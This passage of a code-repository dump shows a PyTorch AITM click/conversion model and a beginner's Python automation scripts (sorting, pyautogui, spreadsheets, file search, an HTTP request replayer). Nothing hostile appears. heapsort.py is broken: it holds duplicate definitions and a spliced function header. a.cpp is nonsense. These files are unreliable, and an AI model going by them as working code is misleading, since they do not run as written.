%\n (epoch + 1, best_epoch))\n return\n\n\ndef test():\n print(\"Start Test ...\")\n test_loader = get_dataloader('./data/ctr_cvr.test',\n batch_size=batch_size,\n shuffle=False)\n model = AITM(vocabulary_size, 5)\n model.load_state_dict(torch.load(model_file))\n model.eval()\n click_list = []\n conversion_list = []\n click_pred_list = []\n conversion_pred_list = []\n for i, batch in enumerate(test_loader):\n if i % 1000:\n sys.stdout.write(\"test step:{}\\r\".format(i))\n sys.stdout.flush()\n click, conversion, features = batch\n with torch.no_grad():\n click_pred, conversion_pred = 
model(features)\n click_list.append(click)\n conversion_list.append(conversion)\n click_pred_list.append(click_pred)\n conversion_pred_list.append(conversion_pred)\n click_auc = cal_auc(click_list, click_pred_list)\n conversion_auc = cal_auc(conversion_list, conversion_pred_list)\n print(\"Test Resutt: click AUC: {} conversion AUC:{}\".format(\n click_auc, conversion_auc))\n\n\ndef cal_auc(label: list, pred: list):\n label = torch.cat(label)\n pred = torch.cat(pred)\n label = label.detach().numpy()\n pred = pred.detach().numpy()\n auc = roc_auc_score(label, pred, labels=np.array([0.0, 1.0]))\n return auc\n\n\nif __name__ == \"__main__\":\n train()\n test()\n"
},
{
"alpha_fraction": 0.5786557197570801,
"alphanum_fraction": 0.5940737128257751,
"avg_line_length": 34.784481048583984,
"blob_id": "8ecc67055ef7cf2e8c32a45378d494aa6211e58a",
"content_id": "d9b2dec04f857b38ef506a58440cae095343f44c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4151,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 116,
"path": "/model.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch import nn\n\n\nclass Tower(nn.Module):\n def __init__(self,\n input_dim: int,\n dims=[128, 64, 32],\n drop_prob=[0.1, 0.3, 0.3]):\n super(Tower, self).__init__()\n self.dims = dims\n self.drop_prob = drop_prob\n self.layer = nn.Sequential(nn.Linear(input_dim, dims[0]), nn.ReLU(),\n nn.Dropout(drop_prob[0]),\n nn.Linear(dims[0], dims[1]), nn.ReLU(),\n nn.Dropout(drop_prob[1]),\n nn.Linear(dims[1], dims[2]), nn.ReLU(),\n nn.Dropout(drop_prob[2]))\n\n def forward(self, x):\n x = torch.flatten(x, start_dim=1)\n x = self.layer(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self, dim=32):\n super(Attention, self).__init__()\n self.dim = dim\n self.q_layer = nn.Linear(dim, dim, bias=False)\n self.k_layer = nn.Linear(dim, dim, bias=False)\n self.v_layer = nn.Linear(dim, dim, bias=False)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, inputs):\n Q = self.q_layer(inputs)\n K = self.k_layer(inputs)\n V = self.v_layer(inputs)\n a = torch.sum(torch.mul(Q, V), -1) / torch.sqrt(torch.tensor(self.dim))\n a = self.softmax(a)\n outputs = torch.sum(torch.mul(torch.unsqueeze(a, -1), V), dim=1)\n return outputs\n\n\nclass AITM(nn.Module):\n def __init__(self,\n feature_vocabulary: dict[str, int],\n embedding_size: int,\n tower_dims=[128, 64, 32],\n drop_prob=[0.1, 0.3, 0.3]):\n super(AITM, self).__init__()\n self.feature_vocabulary = feature_vocabulary\n self.feature_names = sorted(list(feature_vocabulary.keys()))\n self.embedding_size = embedding_size\n self.embedding_dict = nn.ModuleDict()\n self.__init_weight()\n\n self.tower_input_size = len(feature_vocabulary) * embedding_size\n self.click_tower = Tower(self.tower_input_size, tower_dims, drop_prob)\n self.conversion_tower = Tower(self.tower_input_size, tower_dims, drop_prob)\n self.attention_layer = Attention(tower_dims[-1])\n\n self.info_layer = nn.Sequential(nn.Linear(tower_dims[-1], 32), nn.ReLU(),\n nn.Dropout(drop_prob[-1]))\n\n self.click_layer = nn.Sequential(nn.Linear(tower_dims[-1], 1),\n nn.Sigmoid())\n self.conversion_layer = nn.Sequential(nn.Linear(tower_dims[-1], 1),\n nn.Sigmoid())\n\n def __init_weight(self, ):\n for name, size in self.feature_vocabulary.items():\n emb = nn.Embedding(size, self.embedding_size)\n nn.init.normal_(emb.weight, mean=0.0, std=0.01)\n self.embedding_dict[name] = emb\n\n def forward(self, x):\n feature_embedding = []\n for name in self.feature_names:\n embed = self.embedding_dict[name](x[name])\n feature_embedding.append(embed)\n feature_embedding = torch.cat(feature_embedding, 1)\n tower_click = self.click_tower(feature_embedding)\n\n tower_conversion = torch.unsqueeze(\n self.conversion_tower(feature_embedding), 1)\n\n info = torch.unsqueeze(self.info_layer(tower_click), 1)\n\n ait = self.attention_layer(torch.cat([tower_conversion, info], 1))\n\n click = torch.squeeze(self.click_layer(tower_click), dim=1)\n conversion = torch.squeeze(self.conversion_layer(ait), dim=1)\n\n return click, conversion\n\n def loss(self,\n click_label,\n click_pred,\n conversion_label,\n conversion_pred,\n constraint_weight=0.6,\n device=\"gpu:1\"):\n click_label = click_label.to(device)\n conversion_label = conversion_label.to(device)\n\n click_loss = nn.functional.binary_cross_entropy(click_pred, click_label)\n conversion_loss = nn.functional.binary_cross_entropy(\n conversion_pred, conversion_label)\n\n label_constraint = torch.maximum(conversion_label - click_label,\n torch.zeros_like(click_label))\n constraint_loss = torch.sum(label_constraint)\n\n loss = click_loss + 
conversion_loss + constraint_weight * constraint_loss\n return loss\n"
},
{
"alpha_fraction": 0.5429936051368713,
"alphanum_fraction": 0.5891719460487366,
"avg_line_length": 22.259260177612305,
"blob_id": "0098c2d8959b3d5dfe3932e0219ac8b0dd37547c",
"content_id": "9332d8af8ce85e7019b91897b0f3ef8ab4c0b92d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 27,
"path": "/model_test.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "import model\nimport torch\n\n\ndef test_model():\n\n feature_vocab = {\"0\": 10, \"1\": 12, \"2\": 20}\n embedding_size = 4\n m = model.AITM(feature_vocab, embedding_size)\n inputs = {\n \"0\": torch.tensor([[1], [2]]),\n \"1\": torch.tensor([[2], [3]]),\n \"2\": torch.tensor([[10], [11]])\n }\n click, conversion = m(inputs)\n print(\"click_pred:\", click.shape)\n print(\"covnersion_pred:\", conversion.shape)\n\n click_label = torch.tensor([1.0, 1.0])\n conversion_label = torch.tensor([1.0, 0.0])\n\n loss = m.loss(click_label, click, conversion_label, conversion)\n print(\"loss: \", loss)\n\n\nif __name__ == \"__main__\":\n test_model()\n"
},
{
"alpha_fraction": 0.6069600582122803,
"alphanum_fraction": 0.6131013035774231,
"avg_line_length": 27.735294342041016,
"blob_id": "215828c115928d40469549bc05cdb1e89c42af76",
"content_id": "88d2bfe76202c8ed701b4d54e71744ded6dcb41b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 977,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 34,
"path": "/dataset.py",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "from torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\n\n\nclass XDataset(Dataset):\n '''load csv data with feature name ad first row'''\n def __init__(self, datafile):\n super(XDataset, self).__init__()\n self.feature_names = []\n self.datafile = datafile\n self.data = []\n self._load_data()\n\n def _load_data(self):\n print(\"start load data from: {}\".format(self.datafile))\n count = 0\n with open(self.datafile) as f:\n self.feature_names = f.readline().strip().split(',')[2:]\n for line in f:\n count += 1\n line = line.strip().split(',')\n line = [int(v) for v in line]\n self.data.append(line)\n print(\"load data from {} finished\".format(self.datafile))\n\n def __len__(self, ):\n return len(self.data)\n\n def __getitem__(self, idx):\n line = self.data[idx]\n click = line[0]\n conversion = line[1]\n features = dict(zip(self.feature_names, line[2:]))\n return click, conversion, features\n"
},
{
"alpha_fraction": 0.6812030076980591,
"alphanum_fraction": 0.7503759264945984,
"avg_line_length": 23.55555534362793,
"blob_id": "74410625da44e0f0c62cb93e084075146484314b",
"content_id": "932354c505c7173d691ee5619e974c5361c38dd6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 665,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 27,
"path": "/README.md",
"repo_name": "rockyzhengwu/AITM-torch",
"src_encoding": "UTF-8",
"text": "# AITM-torch\n\n- [Official Tensorflow implementation](https://github.com/xidongbo/AITM)\n- [Paper](https://arxiv.org/abs/2105.08489)\n\n## Dataset\n\nDownload and preprocess dataset use [script](https://github.com/xidongbo/AITM/blob/main/process_public_dataset.py) in [official Tensorflow implementation](https://github.com/xidongbo/AITM)\n```python\npython process_public_dataset.py\n\n```\n\n## Train && Test\n\n```\nmkdir out\npython train.py\n```\n\n## AUC performance\n\nTest AUC on [Alibaba Click and Conversion Prediction](https://tianchi.aliyun.com/datalab/dataSet.html?dataId=408) dataset\n\n```\nTest Resutt: click AUC: 0.6189267022220789 conversion AUC:0.6544229866061039\n```\n\n\n"
}
] | 6 |
ericlin1001/AutomateTheBoringStuff | https://github.com/ericlin1001/AutomateTheBoringStuff | 0b8804767c38b3207b60d5afce1ec2174dc3699d | 28ce29e5e6b8e399628a1f820738116f250d88d8 | ba6edeebf985473aefb0949eb393f3a52ab8e613 | refs/heads/master | 2021-01-01T05:44:27.625220 | 2016-04-13T05:33:01 | 2016-04-13T05:33:01 | 56,124,773 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5025380849838257,
"alphanum_fraction": 0.5228426456451416,
"avg_line_length": 13.071428298950195,
"blob_id": "72d93fc2d2cf191cfe552bbb4605e4b996f551bd",
"content_id": "3f8611fca43632c06be70b58d53719523bfa8594",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 14,
"path": "/saveVar.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import shelve\n\nsf = shelve.open('shelvedata');\nsf.setdefault('a', 0);\nsf.setdefault('b', 0);\na = sf['a'];\nb = sf['b'];\nprint(a);\nprint(b);\na =a + 1;\nb = b + 1;\nsf['a'] = a\nsf['b'] = b;\nsf.close();\n"
},
{
"alpha_fraction": 0.47448521852493286,
"alphanum_fraction": 0.48075202107429504,
"avg_line_length": 26.924999237060547,
"blob_id": "96ad0669f114e7453cd7ef9fb398cf95639fa2e0",
"content_id": "bbddcb7f29f4dd79c4bd160f1dc2ef6cb313f2d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 40,
"path": "/printTable.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def formatT(t, w, type):\n if type == \"left\":\n return t + (' ' * (w - len(t)))\n\n elif type == \"center\":\n return t.center(w);\n else:\n # return (' ' * (w - len(t))) + t;\n return t.rjust(w);\n\ndef flip(mylist):\n ns = list(range(len(mylist[0])))\n for j in range(len(mylist[0])):\n ns[j] = list(range(len(mylist)))\n for i in range(len(mylist)):\n ns[j][i] = mylist[i][j]\n mylist = ns\n return ns\n\ndef printTab(mylist):\n mylist = flip(mylist)\n cmax = [0 for x in range(len(mylist[0]))];\n for r in range(len(mylist)):\n for c in range(len(mylist[0])):\n cmax[c] = max(cmax[c], len(mylist[r][c]));\n ns = 1;\n for r in range(len(mylist)):\n for c in range(len(mylist[0])):\n print(formatT(mylist[r][c], cmax[c], \"right\"), end = (' ' * ns));\n print()\n\n\ndef test():\n tableData = [['apples', 'oranges', 'cherries', 'banana'], \n ['Alice', 'Bob', 'Carol', 'David'], \n ['dogs', 'cats', 'moose', 'goose']]\n printTab(tableData);\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 23.66666603088379,
"blob_id": "0c54188c05af8777da451bc3e4673835f52e400f",
"content_id": "3b65a271c3a7415a63145b56abbf90ef55618971",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 3,
"path": "/ShowImg.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import subprocess\ndef showImg(file):\n subprocess.Popen(['see', file]);\n"
},
{
"alpha_fraction": 0.44180938601493835,
"alphanum_fraction": 0.4624505937099457,
"avg_line_length": 22.968421936035156,
"blob_id": "6f33922e83a54d2646046ea348f0cab536cfe4c9",
"content_id": "b5ed05f7db53c4e501960ef374953a1d41d8e1db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2277,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 95,
"path": "/locateScreen.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\nfrom PIL import Image;\nimport numpy as np;\n\ndef locate(file, sim = 0.999):\n tmp = '/tmp/tmp.png'\n src = pyautogui.screenshot(tmp);\n #src = Image.open(tmp);\n key = Image.open(file);\n\n #f = findImg(src, key, sim);\n f = searchMatrix(convertToMatrix(src), convertToMatrix(key), sim);\n print(f);\n src.close();\n key.close();\n return f;\n\ndef convertColor(c):\n r, g, b = c;\n return (r + g + b) / 3 / 255;\n\ndef convertToMatrix(img):\n w, h = img.size;\n m = np.zeros(w * h).reshape(w, h);\n for x in range(w):\n for y in range(h):\n m[x][y] = convertColor(img.getpixel((x, y)));\n return m\n\ndef searchMatrix(src, key, sim):\n w, h = key.shape;\n dw, dh = src.shape\n dw = dw - w;\n dh = dh - h\n diff = 1.0 - sim;\n# print(\"diff:%f\"%diff);\n for x in range(dw):\n for y in range(dh):\n# if x%200 == 0:\n # print(\"search in (%d, %d)\"%(x, y));\n crop = src[x:x + w, y:y + h];\n d = crop - key;\n d = d * d;\n d\n dd = d.sum() / (w * h)\n# print(\"search in (%d, %d) dd:%f diff:%f\"%(x, y, dd, diff));\n if dd<= diff:\n return x, y;\n return None;\n\n\n\ndef getColorDiff(a, b):\n diff = 0;\n for i in range(3):\n d = a[i] - b[i];\n diff = diff + d * d;\n diff = diff / 195075;\n #diff = diff / 3;\n #diff = diff / 255 / 255;\n return diff;\n \ndef calDiff(src, key, dx, dy):\n w, h = key.size;\n diff = 0;\n count = 0;\n for x in range(0, w , int(w / 10)):\n for y in range(0, h , int(h / 10)):\n count = count + 1;\n diff = diff + getColorDiff(src.getpixel((dx + x, dy + y)),\n key.getpixel((x, y)));\n diff = diff/count;\n return diff;\n\n\ndef findImg(src, key, sim = 1):\n w, h = key.size;\n dw, dh = src.size\n dw = dw - w;\n dh = dh - h\n diff = 1 - sim;\n if dw<0 or dh<0 :\n return None\n\n for dx in range(dw + 1):\n for dy in range(dh + 1):\n if dx%10 == 0:\n print(\"search in (%d, %d)\"%(dx, dy));\n if calDiff(src, key, dx, dy)<=diff:\n return dx, dy;\n #cal \n return None;\n\n\n#print(locate('firefox.png'));\n"
},
{
"alpha_fraction": 0.44106462597846985,
"alphanum_fraction": 0.5095056891441345,
"avg_line_length": 22.909090042114258,
"blob_id": "b09b53818bfee6634b741f0c8bd41ee1664cba15",
"content_id": "c8ee7e9e2d84f25f85dae83f8a5c9e148b022234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/strip.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import re\n\ndef strip(s, r = ' '):\n rg = re.compile(r'^' + r + r\"*(.+?)\" + r + r'*$', re.DOTALL);\n res = rg.search(s).group(1);\n print(res);\n print(rg.search(s).groups());\n print(s.strip(r) == res);\n return res;\n\nstrip('123123 12 31 412 3321');\n"
},
{
"alpha_fraction": 0.5931034684181213,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28,
"blob_id": "adf189d77100d10c962e4f4329ab07edf62a3065",
"content_id": "bae10c21dbb0e49cb3d5d82373a7664187bbe2cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 10,
"path": "/moveMouse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import pyautogui\n\ndur = 0.25\npyautogui.FAILSAFE = True\npyautogui.PAUSE = 0.5\nfor i in range(10):\n pyautogui.moveRel(100, 0, duration = dur);\n pyautogui.moveRel(0, 100, duration = dur);\n pyautogui.moveRel( -100, 0, duration = dur);\n pyautogui.moveRel( 0, -100, duration = dur);\n"
},
{
"alpha_fraction": 0.5215686559677124,
"alphanum_fraction": 0.5647059082984924,
"avg_line_length": 35.42856979370117,
"blob_id": "f1c8fbd7ed80d2f93edd9b0e28b19f460245e54c",
"content_id": "173feabd88535410bc50bda9a17a27fbc7c44af8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/detectLargeFile.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os\nfor cf, sb, files in os.walk('/home/ailab'):\n for file in files:\n file = os.path.join(cf, file)\n if not os.path.islink(file):\n if os.path.getsize(file)>100 * 1024 * 1024:\n print(os.path.abspath(file));\n"
},
{
"alpha_fraction": 0.42566511034965515,
"alphanum_fraction": 0.44600939750671387,
"avg_line_length": 20.233333587646484,
"blob_id": "cbf1c55a04d7f546d3dc71dfa35e10caf12d550f",
"content_id": "add9a0a682585def07093c49e571d810c663c520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 30,
"path": "/heapsort.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def swap(a,l, r):\n t = a[l];\n a[l] = a[r];\n a[r] = t;\n\ndef heapsort(a, key = None):\n if key is None:\n key = lambda x:x\n quicksort(a, 0, len(a), key);\n return a;\n \n\ndef heapsort(a, size, key):\n if(l + 1 >= r):\n return;\n mid = partition(a, l, r, key)\n quicksort(a, l, mid, key);\n quicksort(a, mid + 1, r, key);\n\ndef quicksortk(a, ldef test():\n b = [[4, 1], [2, 1], [1, 3], [1, 100]];\n a = b[:];\n print(a);\n print(b);\n qsort(a);\n print(\"after qsort(a).\");\n print(a);\n print(b);\n for i in range(len(b)):\n print(\"getk(b, \" , str(i) , \") = \",getk(b, i));\n\n\n"
},
{
"alpha_fraction": 0.5365535020828247,
"alphanum_fraction": 0.5483028888702393,
"avg_line_length": 33.818180084228516,
"blob_id": "71c85695bbed7978fb96aa41f8e789c5fadbb59c",
"content_id": "6d2e78ef44dce248cb265bac9cab7fa6b1e6ca0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 766,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 22,
"path": "/demo.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def printTD(tuples,dicts):\n\t\"\"\"it receives two args, tuples, dicts.\"\"\"\n\tfor i in range(len(tuples)):\n\t\tprint(\"tuples[\" + str(i) + \"] = \" + str(tuples[i]), end = ', ');\n\tkeys = sorted(dicts.keys(), key = lambda x:len(x));\n\tfor j in keys:\n\t\tprint(\"dicts[\" + str(j) + \"] = \" + str(dicts[j]), end = ', ');\n\ndef foo(arg0, *tuples, **dicts):\n\t\"\"\"This is foo function, it receives any number of args.\"\"\"\n\tprint(\"foo.__doc__ = \" + foo.__doc__);\n\tprint(\"foo(arg0:\"+str( arg0), end = ', ');\n\tprintTD(tuples, dicts);\n\tprint(\")\");\n\tbar( *tuples, ** dicts);\n\ndef bar(arg0, arg1, *tuples, **dicts):\n\t\"\"\"This is bar function\"\"\"\n\tprint(\"bar.__doc__ = \" + bar.__doc__);\n\tprint(\"bar(arg0:\" + str(arg0) + \", arg1:\" + str(arg1), end = ', ');\n\tprintTD(tuples, dicts);\n\tprint(\")\");\n"
},
{
"alpha_fraction": 0.6613546013832092,
"alphanum_fraction": 0.675298810005188,
"avg_line_length": 30.375,
"blob_id": "dd6d3c8b974bcdae1c5bc9601ec6efee4b44bdee",
"content_id": "2fd66357b6920d834363eaedf5b0d0c97849df2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 16,
"path": "/lucksearch.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "#! python3\n# lucksearch.py - Open several Google search results.\nimport requests, sys, webbrowser, bs4\n#get the command line args.\nprint('Googling...');\nres = requests.get('https://google.com/search?q=' + ' '.join(sys.argv[1:]))\nres.raise_for_status();\n\n#get the top5 links in search page.\nsoup = bs4.BeautifulSoup(res.text);\n\n#open all the 5 links.\nlink = soup.select('.r a');\nnumOpen = min(5, len(link));\nfor i in range(numOpen):\n webbrowser.open('https://google.com' + link[i].get('href'));\n"
},
{
"alpha_fraction": 0.4423076808452606,
"alphanum_fraction": 0.45604395866394043,
"avg_line_length": 21.369230270385742,
"blob_id": "1b33528ff71393316a07c74c553ace46a63af805",
"content_id": "eec7ed3421fa62d4cdd39874f08c519f2d416f30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1456,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 65,
"path": "/quicksort.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "def swap(a,l, r):\n if l == r:\n return;\n t = a[l];\n a[l] = a[r];\n a[r] = t;\n\ndef partition(a, l, r, key):\n pivot = a[l];\n kp = key(pivot)\n r = r - 1;\n swap(a, l, r);\n left = l;#pointing next biggerOrEqual than pivot.\n while l < r:\n if(key(a[l])<kp):\n swap(a, l, left);\n left = left + 1;\n l = l + 1;\n swap(a,r, left);\n return left;\n\ndef qsort(a, key = None):\n if key is None:\n key = lambda x:x\n quicksort(a, 0, len(a), key);\n return a;\n \n\ndef quicksort(a, l, r, key):\n if(l + 1 >= r):\n return;\n mid = partition(a, l, r, key)\n quicksort(a, l, mid, key);\n quicksort(a, mid + 1, r, key);\n\ndef quicksortk(a, l, r, k, key):\n \"\"\"This is the unstable version of quicksort.\"\"\"\n if(l + 1 >= r):\n return a[k];\n mid = partition(a, l, r, key)\n if(mid == k):\n return a[k];\n if(k<mid):\n return quicksortk(a, l, mid ,k, key);\n else:\n return quicksortk(a, mid + 1, r, k, key);\n\ndef getk(a, k, key = None):\n if key is None:\n key = lambda x:x\n if(k<0 or k >= len(a)):\n return None;\n return quicksortk(a, 0, len(a), k, key);\n\ndef test():\n b = [[4, 1], [2, 1], [1, 3], [1, 100]];\n a = b[:];\n print(a);\n print(b);\n qsort(a);\n print(\"after qsort(a).\");\n print(a);\n print(b);\n for i in range(len(b)):\n print(\"getk(b, \" , str(i) , \") = \",getk(b, i));\n\n\n"
},
{
"alpha_fraction": 0.4381868243217468,
"alphanum_fraction": 0.44093406200408936,
"avg_line_length": 25.962963104248047,
"blob_id": "f4465ed5542b2165d1ae04bfb664a2b0ef514c16",
"content_id": "1da4935c3b6d306dda4a15c19838ad2229ea0cc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 27,
"path": "/findInAlltxt.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import os, re\n\ndef usage():\n print(\"\"\"\\\nUsage: findInAlltxt.py [OPTION]... PATTERN [FILE]...\nTry 'findInAlltxt.py --help' for more information.\n\"\"\");\nif len(os.sys.argv) == 1:\n usage()\nelse:\n reg = re.compile(os.sys.argv[1]);\n isFind = False;\n for cf, sub, f in os.walk('.'):\n for file in f:\n file = os.path.join(cf, file);\n if file.endswith(\".txt\"):\n f = open(file, 'r');\n fx = f.read();\n m = reg.search(fx);\n if m is not None:\n isFind = True;\n print(file + \":\");\n print(\"\\t\" + m.group());\n f.close();\n\n if not isFind:\n print(\"Not Found.\");\n"
},
{
"alpha_fraction": 0.59375,
"alphanum_fraction": 0.59375,
"avg_line_length": 7,
"blob_id": "133b330a9379100eddc7ec411f92c9483b6fb7d0",
"content_id": "f08393dd5c75773585f254f66afab3bdff041cbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 4,
"path": "/a.cpp",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "int main(){\n\tadfasdf;\n\tadfaf;\n}\n"
},
{
"alpha_fraction": 0.5997304320335388,
"alphanum_fraction": 0.6199460625648499,
"avg_line_length": 21.484848022460938,
"blob_id": "bbdbac1395a049d7d563b3b37d27d837717af0d7",
"content_id": "9ec45de057283e153dec3d70fcb6071988386ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 742,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 33,
"path": "/multiplicationTable.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "# python3\n# multiplicationTable.py num - save multiplicationTable in a spreadsheet.\nimport openpyxl, openpyxl.cell\nimport os\n\n#read command line.\nif len(os.sys.argv) < 2:\n num = 5;\nelse:\n num = int(os.sys.argv[1]);\n\nprint(\"Creating multiplicationTable with num = %d, saving to m%d.xlsx\"%(num,\n num));\n\n#create the table.\nwb = openpyxl.Workbook();\nwb.remove_sheet(wb.active)\ns = wb.create_sheet(\"multiplicationTable(num=%d)\"%num);\ntable = [0] * num\nfor i in range(1, num + 1):\n table[i - 1] = [0] * num\n for j in range(1, num + 1):\n table[i - 1][j - 1] = i * j\n cn =openpyxl.cell.get_column_letter(j) + str(i) \n s[cn] = table[i - 1][j - 1];\n\nwb.save('m%d.xlsx'%num);\n\n\n\n\n\n#save the table into spread sheet.\n"
},
{
"alpha_fraction": 0.7547892928123474,
"alphanum_fraction": 0.7547892928123474,
"avg_line_length": 42.5,
"blob_id": "4e931e764923e96f7e5fe9165fd72f43f936d140",
"content_id": "f65917da5ec8b1d04fa4dfd023114eb70393516a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 6,
"path": "/log.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import logging\n#logging.basicConfig(level = logging.DEBUG);\n#logging.basicConfig(level = logging.DEBUG, format = '%(message)s');\nlogging.basicConfig(level = logging.DEBUG, format = logging.BASIC_FORMAT)\nlogging.debug('adfadf');\nlogging.debug('what the fuck.');\n"
},
{
"alpha_fraction": 0.47698208689689636,
"alphanum_fraction": 0.4993606209754944,
"avg_line_length": 23.825397491455078,
"blob_id": "292119ba9932387aab0e714d578d3fdbc085442e",
"content_id": "f530888afbc90e0e3e374ca11280b0e32b091ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/parse.py",
"repo_name": "ericlin1001/AutomateTheBoringStuff",
"src_encoding": "UTF-8",
"text": "import urllib3\nimport random\ndef modify(s, key, v):\n v = str(v);\n v = v.replace('\"', '');\n key = key.replace('\"', '');\n key = '\"' + key + '\"';\n l = s.find('\"', s.find(':', s.find(key) + len(key)))\n r = s.find('\"', l + 1);\n #print(\"left:\", s[0:l]); \n #print(\"right:\", s[r:]);\n s = s[0:l + 1] + v + s[r:];\n # print(\"sssss:\", s);\n return s;\n\ndef dosth(s):\n mid = 14585825718840192\n mid = mid + random.randint(0, 1000);\n s = modify(s, \"Content\", \"This IS my New Content send by a Agent.\");\n s = modify(s, \"LocalID\", mid);\n s = modify(s, \"ClientMsgId\", mid);\n\n return s;\n\n#def parse(method,url, fields, headers):\ndef parse():\n f = open(\"requestData\");\n fx = f.read();\n fx = fx.replace(\" \", \" \");\n fx = fx.replace(\" \", \" \");\n fx = dosth(fx);\n #print(fx);\n ffx = fx.split(\"\\n\\n\");\n #print(ffx);\n sx = ffx[0].split(\" \");\n url = sx[1];\n method = sx[0];\n #\n hx = ffx[1].split(\"\\n\");\n headers = {};\n for i in hx:\n si = i.split(\": \");\n headers[si[0]] = si[1];\n\n fields = ffx[2];\n return (url, method, fields, headers);\n\ndef request():\n http = urllib3.PoolManager();\n\n #url =\"\"\n #method = \"\";\n #fields = {}\n #headers = {};\n #parse(url, method, fields, headers);\n parse();\n url, method, fields, headers = parse();\n print(\"url:\", url,\"\\nmethod:\", method,\"\\nfields:\", fields,\"\\nheaders:\", headers);\n res = http.urlopen(method, url, body = fields, headers = headers);\n print(res.status, res.data);\n\nrandom.seed();\nrequest();\n"
},
{
"alpha_fraction": 0.41796875,
"alphanum_fraction": 0.431640625,
"avg_line_length": 14.96875,
"blob_id": "3778487047718f70b10c6c93f7bb69f7fffe11fd",
"content_id": "43414479326454ba0dca0d6c1f66baa5495df42c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 32,
